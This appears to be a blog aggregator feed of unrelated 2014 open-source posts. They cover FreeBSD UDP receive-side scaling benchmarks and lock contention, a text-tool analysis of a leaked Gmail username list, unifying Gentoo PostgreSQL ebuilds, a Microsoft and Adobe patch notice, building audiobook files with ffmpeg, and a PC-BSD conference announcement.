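For reference, if I recall the ix(4) sysctls correctly, flow control can be toggled per device (0 = none, 1 = rx pause, 2 = tx pause, 3 = full, the driver default):

```shell
# Disable 802.3x flow control on the first ix interface; repeat per NIC.
sysctl dev.ix.0.fc=0
```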

The revised results are mostly linear - with more active RSS buckets (and thus CPUs) things seem to get slightly more efficient:
  • 1 udp-clt process: 710,000; 710,000; 266,000; 266,000; 266,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 512,000; 512,000; 512,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 810,000; 810,000; 810,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 1,120,000; 1,120,000; 1,120,000

Finally, let's repeat the process, but only receiving instead of also echoing the packets back to the client:

$ rss-udp-srv 0 10.11.2.1
  • 1 udp-clt process: 710,000; 710,000; 204,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 378,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 645,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 900,000
The receive-only workload actually performs worse than the transmit + receive workload!

What's going on here?

Well, a little digging shows that in both instances - even with a single udp-clt thread running which means only one CPU on the server side is actually active! - there's active lock contention.

Here's an example dtrace output for measuring lock contention with only one active process, where one CPU is involved (and the other three are idle):

Receive only, 5 seconds:

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # dtrace -n 'lockstat:::adaptive-block { @[stack()] = sum(arg1); }'
dtrace: description 'lockstat:::adaptive-block ' matched 1 probe
^C

              kernel`udp_append+0x11c
              kernel`udp_input+0x8cc
              kernel`ip_input+0x116
              kernel`netisr_dispatch_src+0x1cb
              kernel`ether_demux+0x123
              kernel`ether_nh_input+0x34d
              kernel`netisr_dispatch_src+0x61
              kernel`ether_input+0x26
              kernel`ixgbe_rxeof+0x2f7
              kernel`ixgbe_msix_que+0xb6
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
         46729281


Transmit + receive, 5 seconds:

dtrace: description 'lockstat:::adaptive-block ' matched 1 probe
^C

              kernel`knote+0x7e
              kernel`sowakeup+0x65
              kernel`udp_append+0x14a
              kernel`udp_input+0x8cc
              kernel`ip_input+0x116
              kernel`netisr_dispatch_src+0x1cb
              kernel`ether_demux+0x123
              kernel`ether_nh_input+0x34d
              kernel`netisr_dispatch_src+0x61
              kernel`ether_input+0x26
              kernel`ixgbe_rxeof+0x2f7
              kernel`ixgbe_msix_que+0xb6
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
             3793

              kernel`udp_append+0x11c
              kernel`udp_input+0x8cc
              kernel`ip_input+0x116
              kernel`netisr_dispatch_src+0x1cb
              kernel`ether_demux+0x123
              kernel`ether_nh_input+0x34d
              kernel`netisr_dispatch_src+0x61
              kernel`ether_input+0x26
              kernel`ixgbe_rxeof+0x2f7
              kernel`ixgbe_msix_que+0xb6
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
          3823793

              kernel`ixgbe_msix_que+0xd3
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
          9918140

Somehow it seems there's less lock contention / blocking going on when both transmit and receive are running!

So then I dug into it using the lock profiling suite. This is for 5 seconds with receive-only traffic on a single RSS bucket / CPU (all other CPUs are idle):

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # sysctl debug.lock.prof.enable=1 ; sleep 5 ; sysctl debug.lock.prof.enable=0
debug.lock.prof.enable: 1 -> 1

debug.lock.prof.enable: 1 -> 0

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # sysctl debug.lock.prof.stats | head -2 ; sysctl debug.lock.prof.stats | sort -nk4 | tail -10
debug.lock.prof.stats: 
     max  wait_max       total  wait_total       count    avg wait_avg cnt_hold cnt_lock name
    1496         0       10900           0          28    389      0  0      0 /usr/home/adrian/work/freebsd/head/src/sys/dev/usb/usb_device.c:2755 (sx:USB config SX lock)
debug.lock.prof.stats: 
       0         0          31           1          67      0      0  0      4 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:888 (spin mutex:sched lock 2)
       0         0        2715           1       49740      0      0  0      7 /usr/home/adrian/work/freebsd/head/src/sys/dev/random/random_harvestq.c:294 (spin mutex:entropy harvest mutex)
       1         0          51           1         131      0      0  0      2 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:1179 (spin mutex:sched lock 1)
       0         0          69           2         170      0      0  0      8 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:886 (spin mutex:sched lock 2)
       0         0       40389           2      287649      0      0  0      8 /usr/home/adrian/work/freebsd/head/src/sys/kern/kern_intr.c:1359 (spin mutex:sched lock 2)
       0         2           2           4          12      0      0  0      2 /usr/home/adrian/work/freebsd/head/src/sys/dev/usb/usb_device.c:2762 (sleep mutex:Giant)
      15        20        6556         520        2254      2      0  0    105 /usr/home/adrian/work/freebsd/head/src/sys/dev/acpica/Osd/OsdSynch.c:535 (spin mutex:ACPI lock (0xfffff80002b10f00))

       4         5      195967       65888     3445501      0      0  0  28975 /usr/home/adrian/work/freebsd/head/src/sys/netinet/udp_usrreq.c:369 (sleep mutex:so_rcv)

Notice the lock contention for the so_rcv (socket receive buffer) handling? What's going on here is pretty amusing - it turns out that because there's so much receive traffic going on, the userland process receiving the data is preempted by the NIC receive thread very often - and when this happens, there's a good chance it will be within the small window during which the receive socket buffer lock is held. Once this happens, the NIC receive thread processes frames until it gets to one that requires the same socket buffer lock already held by userland - and it fails to acquire it - so the NIC thread sleeps until the userland thread finishes consuming a packet. Then the CPU flips back to the NIC thread, which resumes processing frames.

When the userland code is also transmitting frames it's increasing the amount of time in between socket receives and decreasing the probability of hitting the lock contention condition above.

Note there's no contention between CPUs here - this is entirely contention within a single CPU.

So for now I'm happy that the UDP IPv4 path is scaling well enough with RSS on a single core. The main performance problem here is the socket receive buffer locking (and, yes, copyin() / copyout().)

Next!


There has been some noise around a leak of users/passwords pairs which somehow panicked people into thinking it was coming from a particular provider. Since it seems most people have not even tried looking at the account information available, I'd like to point out some ways that could have helped avoiding the panic, if only the reporters cared. It also fits nicely into my previous notes on accounts' churn.

But before proceeding let me make one thing straight: this post contains no information that is not available to the public and bears no relation to my daily work for my employer. Just wanted to make that clear. Edit: for the official response, please see this blog post of Google's Security blog.

To begin the analysis you need a copy of the list of usernames; Italian blogger Paolo Attivissimo linked to it in his post but I'm not going to do so. Especially since it's likely to become obsolete soon, and might not be liked by many. The archive is a compressed list of usernames without passwords or password hashes. At first, it seems to contain almost exclusively gmail.com addresses — in truth there are more addresses but it probably does not hit the news as much to say that there are some 5 million addresses from some thousand domains.

Let's first try to extract real email addresses from the file, which I'll call rawsource.txt — yes it does not match the name of the actual source file out there but I would rather avoid the search requests finding this post from the filename.

$ fgrep @ rawsource.txt > source-addresses.txt
This removes some two thousand lines that were not valid addresses — it turns out that the file actually contains some passwords, so let's process it a little more to get a bigger sample of valid addresses:

$ sed -i -e 's:|.*::' source-addresses.txt
This should make the next command give us a better estimate of the content:

$ sed -n -e 's:.*@::p' source-addresses.txt | sort | uniq -c | sort -n
[snip]
    238 gmail.com.au
    256 gmail.com.br
    338 gmail.com.vn
    608 gmail.com777
 123215 yandex.ru
4800129 gmail.com
So, as we were saying earlier, there are more than just Google accounts in this. A good chunk of them are on Yandex, but if you look at the outliers in the list there are plenty of other domains, including Yahoo. Let's filter away the four thousand addresses using either broken or outlier domains and instead focus on these three providers:

$ egrep '@(gmail\.com|yahoo\.com|yandex\.ru)$' source-addresses.txt > good-addresses.txt
Now things get more interesting, because to proceed to the next step you have to know how email servers and services work. For these three providers, and many default setups for postfix and the like, the local part of the address (everything before the @ sign) can contain a + sign; when one is present, the local part is split into user and extension, so that mail to nospam+noreally would be delivered to the user nospam. Servers generally ignore the extension altogether, but you can use it either to register multiple accounts on the same mailbox (like I do for PayPal, IKEA, Sony, …) or to filter the received mail into different folders. I know some people who think they can reliably identify the source of spam this way — I'm a bit more skeptical: if I were a spammer I would drop the extension altogether, and only some very die-hard Unix fans would refuse inbound email without one. Especially since I know plenty of services that don't accept email addresses with + in them.
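The splitting rule these providers apply is easy to mimic with sed: everything between the + and the @ is dropped when routing the mail:

```shell
# Route a plus-extension address the way these providers do: drop
# everything between '+' and '@' so both forms hit the same mailbox.
echo 'nospam+noreally@gmail.com' | sed -e 's:+[^@]*@:@:'
# -> nospam@gmail.com
```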

Since this is not very well known, there are going to be very few email addresses using this feature, but that's still good because it limits the amount of data to crawl through. Finding a pattern within 5M addresses is going to take a while, finding one in 4k is much easier:

$ egrep '.*\+.*@.*' good-addresses.txt | sed -e '/.*@.*@.*/d' > experts-addresses.txt
The second command filters out some false positives due to two addresses being on the same line; the result from the source file I started with is 3964 addresses. Now we're talking. Let's extract the extensions from those addresses:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort > extensions.txt
The first obvious thing you can do is figure out if there are duplicates. While the single extensions are probably interesting too, finding a pattern is easier if you have people using the same extension, especially since there aren't that many. So let's see which extensions are common:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort | uniq -c -d | sort -n > common-extensions.txt
A quick look at that file shows that a good chunk of the extensions used (the last line in the generated file) reference xtube – which you may or may not know as a porn website – reminding me of the YouPorn-related leak two and a half years ago. Scouring through the list of extensions, it's also easy to spot the words "porn" and "porno", and even "nudeceleb", which probably makes the list quite up to date.

Just looking at the list of extensions shows a few patterns. Things like friendster, comicbookdb (and variants like comics, comicdb, …) and then daz (dazstudio), and mythtv. As RT points out it might very well be phishing attempts, but it is also well possible that some of those smaller sites such as comicbookdb were breached and people just used the same passwords for their GMail address as the services (I used to, too!), which is why I think mandatory registrations are evil.

The final automatic interesting discovery you can make involves checking for full domains in the extensions themselves:

$ fgrep . extensions.txt | sort -u
This will give you which extensions include a dot in the name, many of which are actually proper site domains: xtube figures again, and so does comicbookdb, friendster, mythtvtalk, dax3d, s2games, policeauctions, itickets and many others.

What does this all tell me? I think what happened is that this list was compiled from breaches of different small websites that wouldn't make a headline (and that most likely did not report to their users!), plus some general phishing. Lots of the passwords that have been confirmed as valid most likely come from people reusing the same password across websites. This breach is fixed like every other before it: stop using the same password across different websites, start using something like LastPass, and use 2-factor authentication wherever possible.


Unifying PostgreSQL Ebuilds titanofold | 2014-09-10 14:01 UTC

After an excruciating wait and years of learning PostgreSQL, it’s time to unify the PostgreSQL ebuilds. I’m not sure what the original motivation was to split the ebuilds, but, from the history I’ve seen on Gentoo, it has always been that way. That’s a piss-poor reason for continuing to do things a certain way, especially when that way is wrong and makes things more tedious and difficult than they ought to be.

I’m to blame for pressing forward with splitting the ebuilds into -docs, -base, and -server when I first got started in Gentoo. I knew from the outset that having them split was not a good idea. I just didn’t know as much as I do now to defend one way or the other. To be fair, Patrick (bonsaikitten) would have gone with whatever I decided to do, but I thought I understood the advantages. Now I look at it and just see disadvantages.

Let’s first look at the build times for building the split ebuilds:

1961.35user 319.42system 33:59.44elapsed 111%CPU (0avgtext+0avgdata 682896maxresident)k
46696inputs+2000640outputs (34major+34350937minor)pagefaults 0swaps
1955.12user 325.01system 33:39.86elapsed 112%CPU (0avgtext+0avgdata 682896maxresident)k
7176inputs+1984960outputs (33major+34349678minor)pagefaults 0swaps
1942.90user 318.89system 33:53.70elapsed 111%CPU (0avgtext+0avgdata 682928maxresident)k
28496inputs+1999688outputs (124major+34343901minor)pagefaults 0swaps
And now the unified ebuild:

1823.57user 278.96system 30:29.20elapsed 114%CPU (0avgtext+0avgdata 683024maxresident)k
32520inputs+1455688outputs (100major+30199771minor)pagefaults 0swaps
1795.63user 282.55system 30:35.92elapsed 113%CPU (0avgtext+0avgdata 683024maxresident)k
9848inputs+1456056outputs (30major+30225195minor)pagefaults 0swaps
1802.47user 275.66system 30:08.30elapsed 114%CPU (0avgtext+0avgdata 683056maxresident)k
13800inputs+1454880outputs (49major+30193986minor)pagefaults 0swaps
So, the unified ebuild is about 10% faster than the split ebuilds.
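That figure follows directly from the elapsed times above (comparing the first run of each set):

```shell
# Convert the first elapsed time of each set to seconds and compare.
split=$(( 33 * 60 + 59 ))      # 33:59.44 elapsed, split ebuilds
unified=$(( 30 * 60 + 29 ))    # 30:29.20 elapsed, unified ebuild
echo "$(( (split - unified) * 100 / split ))% faster"
# -> 10% faster
```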

There are also a few bugs open that will be resolved by moving to a unified ebuild. Whenever someone changes anything in their flags, Portage tends to only pick up dev-db/postgresql-server as needing to be recompiled rather than the appropriate dev-db/postgresql-base, which results in broken setups and failures to even build. I’ve even been accused of pulling the rug out from under people. I swear, it’s not me…it’s Portage…who I lied to. Kind of.

There should be little interruption, though, to the end user. I’ll be keeping all the features that splitting brought us. Okay, feature. There’s really just one feature: Proper slotting. Portage will be informed of the package moves, and everything should be hunky-dory with one caveat: A new ‘server’ USE flag is being introduced to control whether to build everything or just the clients and libraries.

No, I don’t want to do a lib-only flag. I don’t want to work on another hack.

You can check out the progress on my overlay. I’ll be working on updating the dependent packages as well so they’re all ready to go in one shot.


Adobe today released updates to fix at least a dozen critical security problems in its Flash Player and AIR software. Separately, Microsoft pushed four update bundles to address at least 42 vulnerabilities in Windows, Internet Explorer, Lync and .NET Framework. If you use any of these, it’s time to update!

Most of the flaws Microsoft fixed today (37 of them) are addressed in an Internet Explorer update — the only patch this month to earn Microsoft’s most-dire “critical” label. A critical update wins that rating if the vulnerabilities fixed in the update could be exploited with little to no action on the part of users, save for perhaps visiting a hacked or malicious Web site with IE.

I’ve experienced trouble installing Patch Tuesday packages along with .NET updates, so I make every effort to update .NET separately. To avoid any complications, I would recommend that Windows users install all other available recommended patches except for the .NET bundle; after installing those updates, restart Windows and then install any pending .NET fixes. Your mileage may vary.

For more information on the rest of the updates released today, see this post at the Microsoft Security Response Center Blog.

Adobe’s critical update for Flash Player fixes at least 12 security holes in the program. Adobe is urging Windows and Macintosh users to update to Adobe Flash Player v. 15.0.0.152 by visiting the Adobe Flash Player Download Center, or via the update mechanism within the product when prompted. If you’d rather not be bothered with downloaders and software “extras” like antivirus scanners, you’re probably best off getting the appropriate update for your operating system from this link.

To see which version of Flash you have installed, check this link. IE10/IE11 on Windows 8.x and Chrome should auto-update their versions of Flash.

Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera). If you have Adobe AIR installed (required by some programs like Pandora Desktop), you’ll want to update this program. AIR ships with an auto-update function that should prompt users to update when they start an application that requires it; the newest, patched version is v. 15 for Windows, Mac, and Android.

Adobe had also been scheduled to release updates today for Adobe Reader and Acrobat, but the company said it was pushing that release date back to the week of Sept. 15 to address some issues that popped up during testing of the patches.

As always, if you experience any issues updating these products, please leave a note about your troubles in the comments below.


In one of my previous posts I have noted I'm an avid audiobook consumer. I started when I was at the hospital, because I didn't have the energy to read — and most likely, because of the blood sugar being out of control after coming back from the ICU: it turns out that blood sugar changes can make your eyesight go crazy; at some point I had to buy a pair of €20 glasses simply because my doctor prescribed me a new treatment and my eyesight ricocheted out of control for a week or so.

Nowadays, I have trouble sleeping if I'm not listening to something, and I end up with the Audible app installed on all my phones and tablets, with at least a few books preloaded whenever I travel. Of course as I said, I keep the majority of my audiobooks on the iPod, and the reason is that while most of my library is on Audible, not all of it is. There are a few books that I bought on iTunes before finding out about Audible, and then there are a few I received in CD form, including The Hitchhiker's Guide To The Galaxy Complete Radio Series which is among my favourite playlists.

Unfortunately, to be able to convert these from CD to a format that the iPod could digest, I ended up having to buy a software called Audiobook Builder for Mac, which allows you to rip CDs and build M4B files out of them. What's M4B? It's the usual mp4 format container, just with an extension that makes iTunes consider it an audiobook, and with chapter markings in the stream. At the time I first ripped my audiobooks, ffmpeg/libav had no support for chapter markings, so that was not an option. I've been told that said support is there now, but I have not tried getting it to work.

Indeed, what I need to find out is how to build an audiobook file out of a string of mp3 files, and I have no idea how to do that now that I no longer have access to my personal iTunes account on a Mac to re-download the Audiobook Builder and process them. In particular, the mp3s that I'm looking to merge together are the 2013 and 2014 years of BBC's The News Quiz, to which I'm addicted and listen to continuously. Being able to join them all together so I can listen to them in a multi-day-running playlist is one of the very few things that still lets me sleep relatively calmly — I say relatively because I really don't remember the last time I slept soundly, going on a year by now.
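Since I've been told ffmpeg's chapter support is there now, stitching the mp3s into a chaptered M4B might look something like this; an untested sketch, with file names and chapter times made up:

```shell
# Chapter metadata in ffmpeg's FFMETADATA format; START/END use the
# declared TIMEBASE, here milliseconds (30-minute episodes assumed).
cat > chapters.txt <<'EOF'
;FFMETADATA1
title=The News Quiz 2013
[CHAPTER]
TIMEBASE=1/1000
START=0
END=1800000
title=Episode 1
[CHAPTER]
TIMEBASE=1/1000
START=1800000
END=3600000
title=Episode 2
EOF

# Concat list naming the mp3 episodes in playback order.
cat > files.txt <<'EOF'
file 'episode1.mp3'
file 'episode2.mp3'
EOF

# Then, with the episodes actually on disk, mux and re-encode to AAC:
#   ffmpeg -f concat -safe 0 -i files.txt -i chapters.txt \
#       -map_metadata 1 -c:a aac output.m4b
```

The actual muxing step is left commented out since I have not verified it against these files; renaming output.m4b (rather than .m4a) is what makes iTunes treat the result as an audiobook.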

Essentially, what I'd like is for Audible to let me sideload some content (the few books I did not buy from them, and the News Quiz series that I stitch together from the podcast), and create a playlist — then for what I'm concerned I wouldn't have to use an iPod at all. Well, besides the fact that I'd have to find a way to shut up notifications while playing audiobooks. Having Dragons of Autumn Twilight interrupted by the Facebook pop notification is not something I look forward to most of the time. And in some cases I have even had background updates disrupt my playback, so there is definitely space for improvement.


PC-BSD at Fossetcon Official PC-BSD Blog | 2014-09-09 15:13 UTC

Fossetcon will take place September 11–13 at the Rosen Plaza Hotel in Orlando, FL. Registration for this event ranges from $10 to $85 and includes meals and a t-shirt.

There will be a BSD booth in the expo area on both Friday and Saturday from 10:30–18:30. As usual, we’ll be giving out a bunch of cool swag, PC-BSD DVDs, and FreeNAS CDs, as well as accepting donations for the FreeBSD Foundation. Dru Lavigne will present “ZFS 101″ at 11:30 on Saturday. The BSDA certification exam will be held at 15:00 on Saturday.